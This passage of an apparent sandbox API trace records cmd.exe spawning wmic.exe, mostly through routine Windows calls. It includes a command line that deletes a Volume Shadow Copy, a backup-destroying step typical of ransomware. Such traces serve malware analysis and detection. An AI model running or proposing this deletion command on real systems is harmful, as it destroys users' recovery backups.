_String2="C:\\Windows\\System32\\wbem\\WMIC.exe") returned 3 [0122.769] _wcsicmp (_String1="FOR/?", _String2="C:\\Windows\\System32\\wbem\\WMIC.exe") returned 3 [0122.769] _wcsicmp (_String1="IF", _String2="C:\\Windows\\System32\\wbem\\WMIC.exe") returned 6 [0122.769] _wcsicmp (_String1="IF/?", _String2="C:\\Windows\\System32\\wbem\\WMIC.exe") returned 6 [0122.769] _wcsicmp (_String1="REM", _String2="C:\\Windows\\System32\\wbem\\WMIC.exe") returned 15 [0122.769] _wcsicmp (_String1="REM/?", _String2="C:\\Windows\\System32\\wbem\\WMIC.exe") returned 15 [0122.769] GetProcessHeap () returned 0x270000 [0122.769] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0xb0) returned 0x289a00 [0122.769] GetProcessHeap () returned 0x270000 [0122.769] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x54) returned 0x289ac0 [0122.772] GetProcessHeap () returned 0x270000 [0122.772] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x9e) returned 0x289b20 [0122.773] GetConsoleTitleW (in: lpConsoleTitle=0x16f9d0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0122.773] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0122.773] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0122.774] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x16f560, nVolumeNameSize=0x104, lpVolumeSerialNumber=0x16f540, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x16f540*=0x9c354b42, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0122.774] GetProcessHeap () returned 0x270000 [0122.774] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x218) returned 0x289bd0 [0122.774] GetProcessHeap () returned 0x270000 [0122.774] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0xe2) returned 0x289df0 [0122.774] _wcsnicmp (_String1="C:\\W", _String2="cmd ", _MaxCount=0x4) returned -51 [0122.774] GetProcessHeap () returned 0x270000 [0122.774] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x420) returned 0x271320 [0122.775] SetErrorMode (uMode=0x0) returned 0x8001 [0122.775] SetErrorMode (uMode=0x1) returned 0x0 [0122.775] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\wbem\\.", nBufferLength=0x208, lpBuffer=0x271330, lpFilePart=0x16f260 | out: lpBuffer="C:\\Windows\\System32\\wbem", lpFilePart=0x16f260*="wbem") returned 0x18 [0122.775] SetErrorMode (uMode=0x8001) returned 0x1 [0122.775] GetProcessHeap () returned 0x270000 [0122.775] RtlReAllocateHeap (Heap=0x270000, Flags=0x0, Ptr=0x271320, Size=0x54) returned 0x271320 [0122.775] GetProcessHeap () returned 0x270000 [0122.775] RtlSizeHeap (HeapHandle=0x270000, Flags=0x0, MemoryPointer=0x271320) returned 0x54 [0122.775] NeedCurrentDirectoryForExePathW (ExeName="C:\\Windows\\System32\\wbem\\.") returned 1 [0122.775] GetProcessHeap () returned 0x270000 [0122.775] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x48) returned 0x289ee0 [0122.775] GetProcessHeap () returned 0x270000 [0122.775] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x7c) returned 0x289f30 [0122.775] GetProcessHeap () returned 0x270000 [0122.776] RtlReAllocateHeap (Heap=0x270000, Flags=0x0, Ptr=0x289f30, Size=0x48) returned 0x289f30 [0122.776] GetProcessHeap () returned 0x270000 [0122.776] RtlSizeHeap (HeapHandle=0x270000, Flags=0x0, MemoryPointer=0x289f30) returned 0x48 [0122.776] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a4cf360, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0122.776] GetProcessHeap () returned 0x270000 [0122.776] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0xe8) returned 0x289f90 [0122.781] GetProcessHeap () returned 0x270000 [0122.781] RtlReAllocateHeap (Heap=0x270000, Flags=0x0, Ptr=0x289f90, Size=0x7e) returned 0x289f90 [0122.781] GetProcessHeap () returned 0x270000 [0122.781] RtlSizeHeap (HeapHandle=0x270000, Flags=0x0, MemoryPointer=0x289f90) returned 0x7e [0122.782] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0122.782] FindFirstFileExW (in: lpFileName="C:\\Windows\\System32\\wbem\\WMIC.exe", fInfoLevelId=0x1, lpFindFileData=0x16efd0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x16efd0) returned 0x28a020 [0122.782] GetProcessHeap () returned 0x270000 [0122.782] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x0, Size=0x28) returned 0x2846c0 [0122.782] FindClose (in: hFindFile=0x28a020 | out: hFindFile=0x28a020) returned 1 [0122.783] _wcsicmp (_String1=".exe", _String2=".CMD") returned 2 [0122.783] _wcsicmp (_String1=".exe", _String2=".BAT") returned 3 [0122.783] GetConsoleTitleW (in: lpConsoleTitle=0x16f520, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0122.783] InitializeProcThreadAttributeList (in: lpAttributeList=0x16f2d8, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x16f298 | out: lpAttributeList=0x16f2d8, lpSize=0x16f298) returned 1 [0122.783] UpdateProcThreadAttribute (in: lpAttributeList=0x16f2d8, dwFlags=0x0, Attribute=0x60001, lpValue=0x16f288, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x16f2d8, lpPreviousValue=0x0) returned 1 [0122.783] GetStartupInfoW (in: lpStartupInfo=0x16f3f0 | out: lpStartupInfo=0x16f3f0*(cb=0x68, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x1, hStdOutput=0x0, hStdError=0x0)) [0122.783] GetProcessHeap () returned 0x270000 [0122.783] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x20) returned 0x2846f0 [0122.783] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0122.783] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0122.783] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0122.783] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0122.783] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0122.783] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0122.784] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0122.784] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0122.784] _wcsnicmp (_String1="COPYCMD", _String2="FP_NO_H", _MaxCount=0x7) returned -3 [0122.784] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0122.784] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0122.784] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0122.784] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0122.784] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0122.784] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0122.784] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0122.784] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0122.784] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0122.784] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0122.784] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0122.784] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0122.784] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0122.784] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0122.784] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0122.784] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0122.784] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0122.784] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0122.784] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0122.784] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0122.784] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0122.784] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0122.784] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0122.785] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0122.785] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0122.785] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0122.785] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0122.785] _wcsnicmp (_String1="COPYCMD", _String2="windows", _MaxCount=0x7) returned -20 [0122.785] _wcsnicmp (_String1="COPYCMD", _String2="windows", _MaxCount=0x7) returned -20 [0122.785] GetProcessHeap () returned 0x270000 [0122.785] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x2846f0 | out: hHeap=0x270000) returned 1 [0122.785] GetProcessHeap () returned 0x270000 [0122.785] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x12) returned 0x288a30 [0122.785] lstrcmpW (lpString1="\\WMIC.exe", lpString2="\\XCOPY.EXE") returned -1 [0122.786] CreateProcessW (in: lpApplicationName="C:\\Windows\\System32\\wbem\\WMIC.exe", lpCommandLine="C:\\Windows\\System32\\wbem\\WMIC.exe shadowcopy where \"ID='{E3DFFA61-E1CC-49E0-BCD2-5A0175DAACD9}'\" delete", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpStartupInfo=0x16f310*(cb=0x70, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\System32\\wbem\\WMIC.exe shadowcopy where \"ID='{E3DFFA61-E1CC-49E0-BCD2-5A0175DAACD9}'\" delete", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x16f2c0 | out: lpCommandLine="C:\\Windows\\System32\\wbem\\WMIC.exe shadowcopy where \"ID='{E3DFFA61-E1CC-49E0-BCD2-5A0175DAACD9}'\" delete", lpProcessInformation=0x16f2c0*(hProcess=0x54, hThread=0x50, dwProcessId=0x158, dwThreadId=0xaa8)) returned 1 [0122.791] CloseHandle (hObject=0x50) returned 1 [0122.791] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0122.791] GetProcessHeap () returned 0x270000 [0122.791] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x28c360 | out: hHeap=0x270000) returned 1 [0122.791] GetEnvironmentStringsW () returned 0x28ad60* [0122.791] GetProcessHeap () returned 0x270000 [0122.791] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0xae8) returned 0x28b850 [0122.791] FreeEnvironmentStringsW (penv=0x28ad60) returned 1 [0122.791] WaitForSingleObject (hHandle=0x54, dwMilliseconds=0xffffffff) returned 0x0 [0124.891] GetExitCodeProcess (in: hProcess=0x54, lpExitCode=0x16f208 | out: lpExitCode=0x16f208*=0x0) returned 1 [0124.891] CloseHandle (hObject=0x54) returned 1 [0124.891] _vsnwprintf (in: _Buffer=0x16f478, _BufferCount=0x13, _Format="%08X", _ArgList=0x16f218 | out: _Buffer="00000000") returned 8 [0124.891] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000000") returned 1 [0124.891] GetProcessHeap () returned 0x270000 [0124.891] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x28b850 | out: hHeap=0x270000) returned 1 [0124.891] GetEnvironmentStringsW () returned 0x28ad60* [0124.891] GetProcessHeap () returned 0x270000 [0124.891] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0xb0e) returned 0x28b880 [0124.891] FreeEnvironmentStringsW (penv=0x28ad60) returned 1 [0124.891] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0124.891] GetProcessHeap () returned 0x270000 [0124.891] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x28b880 | out: hHeap=0x270000) returned 1 [0124.891] GetEnvironmentStringsW () returned 0x28ad60* [0124.891] GetProcessHeap () returned 0x270000 [0124.891] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0xb0e) returned 0x28b880 [0124.891] FreeEnvironmentStringsW (penv=0x28ad60) returned 1 [0124.891] GetProcessHeap () returned 0x270000 [0124.891] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x288a30 | out: hHeap=0x270000) returned 1 [0124.891] DeleteProcThreadAttributeList (in: lpAttributeList=0x16f2d8 | out: lpAttributeList=0x16f2d8) [0124.891] _get_osfhandle (_FileHandle=1) returned 0x7 [0124.891] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0124.892] _get_osfhandle (_FileHandle=1) returned 0x7 [0124.892] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a4ce194 | out: lpMode=0x4a4ce194) returned 1 [0124.892] _get_osfhandle (_FileHandle=0) returned 0x3 [0124.892] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a4ce198 | out: lpMode=0x4a4ce198) returned 1 [0124.892] SetConsoleInputExeNameW () returned 0x1 [0124.892] GetConsoleOutputCP () returned 0x1b5 [0124.892] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a4dbfe0 | out: lpCPInfo=0x4a4dbfe0) returned 1 [0124.892] SetThreadUILanguage (LangId=0x0) returned 0x7fffffd0409 [0124.892] exit (_Code=0) Process: id = "49" image_name = "wmic.exe" filename = "c:\\windows\\system32\\wbem\\wmic.exe" page_root = "0x2388e000" os_pid = "0x158" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "48" os_parent_pid = "0x71c" cmd_line = "C:\\Windows\\System32\\wbem\\WMIC.exe shadowcopy where \"ID='{E3DFFA61-E1CC-49E0-BCD2-5A0175DAACD9}'\" delete" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 252 os_tid = 0xaa8 [0122.840] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x22fe30 | out: lpSystemTimeAsFileTime=0x22fe30*(dwLowDateTime=0x50a698d0, dwHighDateTime=0x1d68245)) [0122.840] GetCurrentProcessId () returned 0x158 [0122.840] GetCurrentThreadId () returned 0xaa8 [0122.840] GetTickCount () returned 0x1154386 [0122.840] QueryPerformanceCounter (in: lpPerformanceCount=0x22fe38 | out: lpPerformanceCount=0x22fe38*=24273317051) returned 1 [0122.840] GetModuleHandleW (lpModuleName=0x0) returned 0xff880000 [0122.840] __set_app_type (_Type=0x1) [0122.840] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0xff8cced0) returned 0x0 [0122.841] __wgetmainargs (in: _Argc=0xff8f2380, _Argv=0xff8f2390, _Env=0xff8f2388, _DoWildCard=0, _StartInfo=0xff8f239c | out: _Argc=0xff8f2380, _Argv=0xff8f2390, _Env=0xff8f2388) returned 0 [0122.841] ??0CHString@@QEAA@XZ () returned 0xff8f2ab0 [0122.841] malloc (_Size=0x30) returned 0x565a50 [0122.841] malloc (_Size=0x70) returned 0x565a90 [0122.841] malloc (_Size=0x50) returned 0x567d30 [0122.841] malloc (_Size=0x30) returned 0x567d90 [0122.841] malloc (_Size=0x48) returned 0x567dd0 [0122.841] malloc (_Size=0x30) returned 0x567e20 [0122.842] malloc (_Size=0x30) returned 0x567e60 [0122.842] ??0CHString@@QEAA@XZ () returned 0xff8f2f58 [0122.842] malloc (_Size=0x30) returned 0x567ea0 [0122.842] ?Empty@CHString@@QEAAXXZ () returned 0x7fef4af482c [0122.842] SetConsoleCtrlHandler (HandlerRoutine=0xff8c5724, Add=1) returned 1 [0122.842] _onexit (_Func=0xff8df378) returned 0xff8df378 [0122.842] _onexit (_Func=0xff8df490) returned 0xff8df490 [0122.842] _onexit (_Func=0xff8df4d0) returned 0xff8df4d0 [0122.842] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0122.842] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0 [0122.846] CoInitializeSecurity (pSecDesc=0x0, cAuthSvc=-1, asAuthSvc=0x0, pReserved1=0x0, dwAuthnLevel=0x1, dwImpLevel=0x3, pAuthList=0x0, dwCapabilities=0x0, pReserved3=0x0) returned 0x0 [0122.854] CoCreateInstance (in: rclsid=0xff8873a0*(Data1=0x4590f811, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), pUnkOuter=0x0, dwClsContext=0x1, riid=0xff887370*(Data1=0xdc12a687, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppv=0xff8f2940 | out: ppv=0xff8f2940*=0x1f71390) returned 0x0 [0122.863] GetCurrentProcess () returned 0xffffffffffffffff [0122.863] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x28, TokenHandle=0x22fc00 | out: TokenHandle=0x22fc00*=0xf4) returned 1 [0122.863] GetTokenInformation (in: TokenHandle=0xf4, TokenInformationClass=0x3, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x22fbf8 | out: TokenInformation=0x0, ReturnLength=0x22fbf8) returned 0 [0122.863] malloc (_Size=0x118) returned 0x5669a0 [0122.863] GetTokenInformation (in: TokenHandle=0xf4, TokenInformationClass=0x3, TokenInformation=0x5669a0, TokenInformationLength=0x118, ReturnLength=0x22fbf8 | out: TokenInformation=0x5669a0, ReturnLength=0x22fbf8) returned 1 [0122.863] AdjustTokenPrivileges (in: TokenHandle=0xf4, DisableAllPrivileges=0, NewState=0x5669a0*(PrivilegesCount=0x17, Privileges=((Luid.LowPart=0x5, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x0, Luid.HighPart=2, Attributes=0x9), (Luid.LowPart=0x2, Luid.HighPart=10, Attributes=0x0), (Luid.LowPart=0xb, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x0, Luid.HighPart=2, Attributes=0xd), (Luid.LowPart=0x2, Luid.HighPart=14, Attributes=0x0), (Luid.LowPart=0xf, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x0, Luid.HighPart=2, Attributes=0x12), (Luid.LowPart=0x2, Luid.HighPart=19, Attributes=0x0), (Luid.LowPart=0x14, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x0, Luid.HighPart=2, Attributes=0x17), (Luid.LowPart=0x3, Luid.HighPart=24, Attributes=0x0), (Luid.LowPart=0x19, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x0, Luid.HighPart=2, Attributes=0x1d), (Luid.LowPart=0x3, Luid.HighPart=30, Attributes=0x0), (Luid.LowPart=0x21, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x0, Luid.HighPart=2, Attributes=0x23), (Luid.LowPart=0x2, Luid.HighPart=618649092, Attributes=0xad8d), (Luid.LowPart=0x0, Luid.HighPart=5668576, Attributes=0x0), (Luid.LowPart=0x64006e, Luid.HighPart=7798895, Attributes=0x3b0073), (Luid.LowPart=0x57005c, Luid.HighPart=7209065, Attributes=0x6f0064), (Luid.LowPart=0x53005c, Luid.HighPart=7536761, Attributes=0x650074), (Luid.LowPart=0x5c0032, Luid.HighPart=6422615, Attributes=0x6d0065))), BufferLength=0x0, PreviousState=0x0, ReturnLength=0x0 | out: PreviousState=0x0, ReturnLength=0x0) returned 1 [0122.863] free (_Block=0x5669a0) [0122.863] CloseHandle (hObject=0xf4) returned 1 [0122.864] malloc (_Size=0x40) returned 0x567ee0 [0122.864] malloc (_Size=0x40) returned 0x567f30 [0122.864] malloc (_Size=0x40) returned 0x567f80 [0122.864] malloc (_Size=0x20a) returned 0x5669a0 [0122.864] GetSystemDirectoryW (in: lpBuffer=0x5669a0, uSize=0x105 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0122.864] free (_Block=0x5669a0) [0122.864] malloc (_Size=0x18) returned 0x23dfb0 [0122.864] malloc (_Size=0x18) returned 0x5669a0 [0122.864] malloc (_Size=0x18) returned 0x5669c0 [0122.864] SysStringLen (param_1="C:\\Windows\\system32") returned 0x13 [0122.864] SysStringLen (param_1="\\kernel32.dll") returned 0xd [0122.864] free (_Block=0x23dfb0) [0122.864] free (_Block=0x5669a0) [0122.864] LoadLibraryW (lpLibFileName="C:\\Windows\\system32\\kernel32.dll") returned 0x77940000 [0122.865] GetProcAddress (hModule=0x77940000, lpProcName="SetThreadUILanguage") returned 0x77956d40 [0122.865] SetThreadUILanguage (LangId=0x0) returned 0x7fffffd0409 [0122.865] FreeLibrary (hLibModule=0x77940000) returned 1 [0122.865] free (_Block=0x5669c0) [0122.865] _vsnwprintf (in: _Buffer=0x567f80, _BufferCount=0x1f, _Format="ms_%x", _ArgList=0x22f828 | out: _Buffer="ms_409") returned 6 [0122.865] malloc (_Size=0x20) returned 0x5669a0 [0122.865] GetComputerNameW (in: lpBuffer=0x5669a0, nSize=0x22fc00 | out: lpBuffer="XDUWTFONO", nSize=0x22fc00) returned 1 [0122.866] lstrlenW (lpString="XDUWTFONO") returned 9 [0122.866] malloc (_Size=0x14) returned 0x23dfb0 [0122.866] lstrlenW (lpString="XDUWTFONO") returned 9 [0122.866] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x0, nSize=0x22fbf8 | out: lpNameBuffer=0x0, nSize=0x22fbf8) returned 0x7fffffde000 [0122.867] GetLastError () returned 0xea [0122.867] malloc (_Size=0x40) returned 0x5669d0 [0122.867] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x5669d0, nSize=0x22fbf8 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0x22fbf8) returned 0x1 [0122.867] lstrlenW (lpString="") returned 0 [0122.867] lstrlenW (lpString="XDUWTFONO") returned 9 [0122.867] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="XDUWTFONO", cchCount1=9, lpString2="", cchCount2=0) returned 3 [0122.868] lstrlenW (lpString=".") returned 1 [0122.868] lstrlenW (lpString="XDUWTFONO") returned 9 [0122.868] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="XDUWTFONO", cchCount1=9, lpString2=".", cchCount2=1) returned 3 [0122.869] lstrlenW (lpString="LOCALHOST") returned 9 [0122.869] lstrlenW (lpString="XDUWTFONO") returned 9 [0122.869] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="XDUWTFONO", cchCount1=9, lpString2="LOCALHOST", cchCount2=9) returned 3 [0122.869] lstrlenW (lpString="XDUWTFONO") returned 9 [0122.869] lstrlenW (lpString="XDUWTFONO") returned 9 [0122.869] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="XDUWTFONO", cchCount1=9, lpString2="XDUWTFONO", cchCount2=9) returned 2 [0122.869] free (_Block=0x23dfb0) [0122.869] lstrlenW (lpString="XDUWTFONO") returned 9 [0122.869] malloc (_Size=0x14) returned 0x23dfb0 [0122.869] lstrlenW (lpString="XDUWTFONO") returned 9 [0122.869] lstrlenW (lpString="XDUWTFONO") returned 9 [0122.869] malloc (_Size=0x14) returned 0x566a20 [0122.869] lstrlenW (lpString="XDUWTFONO") returned 9 [0122.869] malloc (_Size=0x8) returned 0x566a40 [0122.869] malloc (_Size=0x18) returned 0x566a60 [0122.869] malloc (_Size=0x30) returned 0x566a80 [0122.869] malloc (_Size=0x18) returned 0x566ac0 [0122.869] SysStringLen (param_1="IDENTIFY") returned 0x8 [0122.869] SysStringLen (param_1="ANONYMOUS") returned 0x9 [0122.869] SysStringLen (param_1="ANONYMOUS") returned 0x9 [0122.870] SysStringLen (param_1="IDENTIFY") returned 0x8 [0122.870] malloc (_Size=0x30) returned 0x566ae0 [0122.870] malloc (_Size=0x18) returned 0x566b20 [0122.870] SysStringLen (param_1="IMPERSONATE") returned 0xb [0122.870] SysStringLen (param_1="ANONYMOUS") returned 0x9 [0122.870] SysStringLen (param_1="IMPERSONATE") returned 0xb [0122.870] SysStringLen (param_1="IDENTIFY") returned 0x8 [0122.870] SysStringLen (param_1="IDENTIFY") returned 0x8 [0122.870] SysStringLen (param_1="IMPERSONATE") returned 0xb [0122.870] malloc (_Size=0x30) returned 0x566b40 [0122.870] malloc (_Size=0x18) returned 0x566b80 [0122.870] SysStringLen (param_1="DELEGATE") returned 0x8 [0122.870] SysStringLen (param_1="IDENTIFY") returned 0x8 [0122.870] SysStringLen (param_1="DELEGATE") returned 0x8 [0122.870] SysStringLen (param_1="ANONYMOUS") returned 0x9 [0122.870] SysStringLen (param_1="ANONYMOUS") returned 0x9 [0122.870] SysStringLen (param_1="DELEGATE") returned 0x8 [0122.870] malloc (_Size=0x30) returned 0x566ba0 [0122.870] malloc (_Size=0x18) returned 0x566be0 [0122.870] malloc (_Size=0x30) returned 0x566c00 [0122.870] malloc (_Size=0x18) returned 0x566c40 [0122.870] SysStringLen (param_1="NONE") returned 0x4 [0122.870] SysStringLen (param_1="DEFAULT") returned 0x7 [0122.870] SysStringLen (param_1="DEFAULT") returned 0x7 [0122.871] SysStringLen (param_1="NONE") returned 0x4 [0122.871] malloc (_Size=0x30) returned 0x566c60 [0122.871] malloc (_Size=0x18) returned 0x566ca0 [0122.871] SysStringLen (param_1="CONNECT") returned 0x7 [0122.871] SysStringLen (param_1="DEFAULT") returned 0x7 [0122.871] malloc (_Size=0x30) returned 0x566cc0 [0122.871] malloc (_Size=0x18) returned 0x566d00 [0122.871] SysStringLen (param_1="CALL") returned 0x4 [0122.871] SysStringLen (param_1="DEFAULT") returned 0x7 [0122.871] SysStringLen (param_1="CALL") returned 0x4 [0122.871] SysStringLen (param_1="CONNECT") returned 0x7 [0122.871] malloc (_Size=0x30) returned 0x566d20 [0122.871] malloc (_Size=0x18) returned 0x566d60 [0122.871] SysStringLen (param_1="PKT") returned 0x3 [0122.871] SysStringLen (param_1="DEFAULT") returned 0x7 [0122.871] SysStringLen (param_1="PKT") returned 0x3 [0122.871] SysStringLen (param_1="NONE") returned 0x4 [0122.871] SysStringLen (param_1="NONE") returned 0x4 [0122.871] SysStringLen (param_1="PKT") returned 0x3 [0122.871] malloc (_Size=0x30) returned 0x566d80 [0122.871] malloc (_Size=0x18) returned 0x566dc0 [0122.871] SysStringLen (param_1="PKTINTEGRITY") returned 0xc [0122.871] SysStringLen (param_1="DEFAULT") returned 0x7 [0122.871] SysStringLen (param_1="PKTINTEGRITY") returned 0xc [0122.872] SysStringLen (param_1="NONE") returned 0x4 [0122.872] SysStringLen (param_1="PKTINTEGRITY") returned 0xc [0122.872] SysStringLen (param_1="PKT") returned 0x3 [0122.872] SysStringLen (param_1="PKT") returned 0x3 